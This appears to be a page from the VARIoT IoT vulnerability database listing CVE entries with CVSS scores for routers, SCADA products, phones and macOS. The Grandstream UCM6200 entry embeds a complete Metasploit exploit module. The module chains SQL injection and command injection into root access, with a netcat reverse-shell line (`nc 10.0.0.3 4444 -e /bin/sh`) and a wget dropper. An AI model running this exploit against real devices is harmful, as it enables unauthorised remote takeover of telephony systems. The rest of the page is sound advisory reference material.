VARIoT IoT vulnerabilities database


VAR-202008-1134 CVE-2020-8688 Intel(R) RAID Web Console 3 for Windows input validation vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Improper input validation in the Intel(R) RAID Web Console 3 for Windows* may allow an unauthenticated user to potentially enable denial of service via network access. Intel RAID Web Console 3 (RWC3) is a web-based application from Intel Corporation that provides monitoring, maintenance, troubleshooting and configuration functions for Intel RAID products. A remote attacker can exploit this vulnerability by sending a malicious POST request that causes the LSA.exe service to exit, resulting in a denial of service.
VAR-202003-1811 CVE-2020-3896 macOS unspecified vulnerability CVSS V2: 4.3
CVSS V3: 5.5
Severity: MEDIUM
This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to overwrite arbitrary files. macOS contains an unspecified vulnerability. Information may be tampered with.
VAR-202003-1810 CVE-2020-3886 macOS use-after-free vulnerability CVSS V2: 9.3
CVSS V3: 7.8
Severity: HIGH
A use after free issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to execute arbitrary code with kernel privileges. macOS contains a use-after-free vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS).
VAR-202003-1080 CVE-2019-20595 Samsung mobile devices authentication vulnerability CVSS V2: 2.1
CVSS V3: 2.4
Severity: LOW
An issue was discovered on Samsung mobile devices with P(9.0) software. Quick Panel allows enabling or disabling the Bluetooth stack without authentication. The Samsung ID is SVE-2019-14545 (July 2019). This vulnerability is published as Samsung ID SVE-2019-14545. Information may be tampered with.
VAR-202003-1023 CVE-2019-20539 Samsung mobile devices out-of-bounds read vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
An issue was discovered on Samsung mobile devices with N(7.x), O(8.x), and P(9.0) (Broadcom chipsets) software. An out-of-bounds read in the Wi-Fi vendor command leads to an information leak. The Samsung ID is SVE-2019-14869 (November 2019). This vulnerability is published as Samsung ID SVE-2019-14869. Information may be obtained.
VAR-202003-1445 CVE-2020-7479 Schneider Electric Interactive Graphical SCADA System Access Control Error Vulnerability CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
A CWE-306: Missing Authentication for Critical Function vulnerability exists in IGSS (Versions 14 and prior using the service: IGSSupdate), which could allow a local user to execute processes that otherwise require elevated privileges when sending local network commands to the IGSS Update Service. IGSS contains a missing-authentication-for-critical-function vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). This vulnerability allows local attackers to escalate privileges on affected installations of Schneider Electric IGSS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the IGSSupdateservice service, which listens on TCP port 12414 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Schneider Electric Interactive Graphical SCADA System (IGSS) is a supervisory control and data acquisition (SCADA) system for monitoring and controlling industrial processes, made by Schneider Electric (France). Schneider Electric IGSS (Interactive Graphical SCADA System) 14 and earlier versions (using the IGSSupdate service) have an access control error vulnerability. The vulnerability stems from network systems or products that do not properly restrict access to resources from unauthorized roles.
VAR-202003-1444 CVE-2020-7478 Schneider Electric Interactive Graphical SCADA System Path traversal vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A CWE-22: Improper Limitation of a Pathname to a Restricted Directory vulnerability exists in IGSS (Versions 14 and prior using the service: IGSSupdate), which could allow a remote unauthenticated attacker to read arbitrary files from the IGSS server PC on an unrestricted or shared network when the IGSS Update Service is enabled. IGSS contains a path traversal vulnerability. Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Schneider Electric IGSS. Authentication is not required to exploit this vulnerability. The specific flaw exists within the IGSSupdateservice service, which listens on TCP port 12414 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose files in the context of SYSTEM. Schneider Electric Interactive Graphical SCADA System (IGSS) is a supervisory control and data acquisition (SCADA) system for monitoring and controlling industrial processes, made by Schneider Electric (France). There is a path traversal vulnerability in Schneider Electric IGSS (Interactive Graphical SCADA System) 14 and earlier (using the IGSSupdate service). The vulnerability stems from network systems or products failing to properly filter special elements in resources or file paths. An attacker could use the vulnerability to access a location outside the restricted directory.
VAR-202003-1447 CVE-2020-7481 Andover Continuum cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists in Andover Continuum (All versions), which could enable a successful cross-site scripting (XSS) attack when using the products' web server.
VAR-202003-0851 CVE-2019-19964 NETGEAR GS728TPS devices authentication vulnerability CVSS V2: 4.0
CVSS V3: 2.7
Severity: LOW
On NETGEAR GS728TPS devices through 5.3.0.35, a remote attacker having network connectivity to the web-administration panel can access part of the web panel, bypassing authentication. NETGEAR GS728TPS devices contain an authentication vulnerability. Information may be obtained. The NETGEAR GS728TPS is a smart managed switch from NETGEAR.
VAR-202003-1435 CVE-2020-5722 Grandstream UCM6200 series SQL injection vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via a crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. The Grandstream UCM6200 series contains an SQL injection vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). Grandstream UCM6200 is a series of enterprise-level IP PBX appliances for IP telephony from the US company Grandstream. Grandstream UCM6200 versions prior to 1.0.19.20 and versions prior to 1.0.20.17 have SQL injection vulnerabilities. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. Exploitation happens in two stages: 1. An SQL injection during username lookup while executing the "Forgot Password" function. 2. A command injection that occurs after the user provided username is passed to a Python script via the shell. Like so: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` This module affect UCM62xx versions before firmware version 1.0.19.20. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module ], 'References' => [ [ 'CVE', '2020-5722' ], [ 'EDB', '48247'] ], 'DisclosureDate' => '2020-03-23', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'DisableNops' => true, 'BadChars' => '\'&|' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'wget' ] } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 8089, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end ## # Sends a POST /cgi request with a payload of action=getInfo. The # server should respond with a large json blob like the following, # where "prog_version" is he firmware version: # # {"response"=>{ # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance", # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/", # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. 
All Rights Reserved.", # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1", # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US", # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0", # "support_webrtc_cloud"=>"0"}, "status"=>0} ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, 'vars_post' => { 'action' => 'getInfo' } }) return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200 body_json = res.get_json_document return CheckCode::Unknown('No JSON in response') unless body_json prog_version = body_json.dig('response', 'prog_version') return false if prog_version.nil? vprint_status("The reported version is: #{prog_version}") version = Rex::Version.new(prog_version) if version < Rex::Version.new('1.0.19.20') return CheckCode::Appears("This determination is based on the version string: #{prog_version}.") end return CheckCode::Safe("This determination is based on the version string: #{prog_version}.") end ## # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection # and then it will get passed to a python script via sh which allows us to execute a command injection. # It will look something like this: # # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ # password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` # # This functionality is related to the"Forgot Password" feature. This function is rate limited by # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few # payloads are appropriate. 
### def execute_command(cmd, _opts = {}) rand_num = Rex::Text.rand_text_numeric(1..5) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi'), 'vars_post' => { 'action' => 'sendPasswordEmail', 'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`" } }, 5) # the netcat reverse shell payload holds the connection open. So we'll treat no response # as a success. The meterpreter payload does not hold the connection open so this clause digs # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload # generates an error (e.g. rate limit error) if res fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200 body_json = res.get_json_document fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json status_json = body_json['status'] fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0 end print_good('Exploit successfully executed.') end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end
VAR-202003-1441 CVE-2020-7475 Multiple Schneider Electric products injection vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
A CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability (reflective DLL) exists in EcoStruxure Control Expert (all versions prior to 14.1 Hot Fix), Unity Pro (all versions), Modicon M340 (all versions prior to V3.20), and Modicon M580 (all versions prior to V3.10), which, if exploited, could allow attackers to transfer malicious code to the controller. Multiple Schneider Electric products contain an injection vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). Schneider Electric Modicon M580 and the other affected products are made by Schneider Electric (France). Schneider Electric Modicon M580 is a programmable automation controller. Schneider Electric Modicon M340 is a mid-range PLC (programmable logic controller) for industrial processes and infrastructure. Schneider Electric EcoStruxure Control Expert (formerly known as Unity Pro) is programming software for Schneider Electric logic controller products. Several Schneider Electric products have injection vulnerabilities that attackers can use to send malicious code to the controller. The following products and versions are affected: EcoStruxure Control Expert versions prior to 14.1 Hot Fix; Unity Pro (all versions); Modicon M340 versions prior to V3.20; Modicon M580 versions prior to V3.10.
VAR-202003-1207 CVE-2016-11022 Multiple NETGEAR Prosafe devices OS command injection vulnerability CVSS V2: 6.5
CVSS V3: 7.2
Severity: HIGH
NETGEAR Prosafe WC9500 5.1.0.17, WC7600 5.1.0.17, and WC7520 2.5.0.35 devices allow a remote attacker to execute code with root privileges via shell metacharacters in the reqMethod parameter to login_handler.php. An OS command injection vulnerability exists in NETGEAR Prosafe WC9500, WC7600, and WC7520 devices. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). NETGEAR Prosafe WC9500 and the other affected models are wireless controllers used by NETGEAR to manage access points. There are security vulnerabilities in NETGEAR Prosafe WC9500 version 5.1.0.17, WC7600 version 5.1.0.17 and WC7520 version 2.5.0.35.
VAR-202003-1448 CVE-2020-7482 Andover Continuum cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists in Andover Continuum (All versions), which could cause a reflected cross-site scripting (XSS) attack when using the products' web server.
VAR-202003-0389 CVE-2020-10364 MikroTik routers resource management error vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
The SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections, and cause a reboot via connect and write system calls, because of uncontrolled resource management. Multiple MikroTik routers contain a resource exhaustion vulnerability. Service operation may be interrupted (DoS). MikroTik routers are router products of the Latvian company MikroTik. The SSH daemon in MikroTik routers v6.44.3 and previous versions has a security vulnerability. A remote attacker can use this vulnerability to prevent new authorized connections from being established.
VAR-202003-1446 CVE-2020-7480 Andover Continuum code injection vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
A CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability exists in Andover Continuum (All versions), which could cause files on the application server filesystem to be viewable when an attacker interferes with an application's processing of XML data. Andover Continuum contains a code injection vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS).
VAR-202003-1440 CVE-2020-7474 ProSoft Configurator uncontrolled search path element vulnerability CVSS V2: 4.4
CVSS V3: 7.8
Severity: HIGH
A CWE-427: Uncontrolled Search Path Element vulnerability exists in ProSoft Configurator (v1.002 and prior) for the PMEPXM0100 (H) module, which could cause the execution of untrusted code when double-clicking to open a project file, which may trigger execution of a malicious DLL. ProSoft Configurator contains an uncontrolled search path element vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). Schneider Electric ProSoft Configurator is a configuration manager for logic controllers from Schneider Electric (France). Schneider Electric ProSoft Configurator v1.002 and previous versions (for the Modicon PMEPXM0100(H) module) have a code issue vulnerability. Attackers can use this vulnerability to execute untrusted code.
VAR-202003-1443 CVE-2020-7477 Multiple Schneider Electric products improper check for exceptional conditions vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Quantum Ethernet Network module 140NOE771x1 (Versions 7.0 and prior), Quantum processors with integrated Ethernet 140CPU65xxxxx (all Versions), and Premium processors with integrated Ethernet (all Versions), which could cause a Denial of Service when sending a specially crafted command over Modbus.
VAR-202003-1795 No CVE ABB PB610 full range of products information disclosure vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
ABB PB610 is software designed by ABB (Switzerland) for the CP600 control panel platform. The full range of ABB PB610 products has an information disclosure vulnerability, which can be used by attackers to obtain sensitive information.
VAR-202003-1812 No CVE Several D-Link routers command execution vulnerability (CNVD-2020-15533) CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
D-Link DIR-878, DIR-882, and DIR-867 are all D-Link router products. Several D-Link routers have a command execution vulnerability that attackers can use to gain control of the device's web server.
VAR-202003-1813 No CVE ifw8 Router ROM router unauthorized access vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The ifw8 Router ROM router is an enterprise-level router from Chengdu Zhifengwang Technology Co., Ltd., mostly used in Internet cafes and large enterprise networks. The ifw8 Router ROM router has an unauthorized access vulnerability, which can be exploited by attackers to obtain sensitive information.